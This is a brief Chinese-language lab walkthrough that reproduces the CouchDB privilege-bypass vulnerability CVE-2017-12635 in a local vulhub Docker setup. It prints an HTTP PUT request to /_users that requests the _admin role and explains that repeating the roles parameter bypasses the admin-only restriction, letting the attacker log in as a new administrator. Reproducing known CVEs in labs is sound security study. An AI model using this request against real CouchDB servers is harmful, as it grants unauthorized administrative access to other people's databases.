Couchdb 垂直权限绕过漏洞(CVE-2017-12635)复现
前提:搭建好docker环境,安装vulhub
漏洞复现:
-
进入CVE-2017-12635漏洞目录,启动docker服务
service docker start -
启动漏洞环境
sudo docker-compose up -d
-
查看容器状态,发现5984端口开启
sudo docker ps
-
访问localhost:5984/_utils/,查看环境是否搭建成功,如下图即成功搭建
-
构造发送一个正常的添加用户数据包
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 172.18.0.1:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 92
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"password": "vulhub"
}
服务器返回错误,显示只允许admin添加用户
- 重复发送roles参数,成功绕过限制,创建用户vulhub
- 尝试用vulhub/vulhub登录,登陆成功
- 关闭镜像
sudo docker-compose down -v
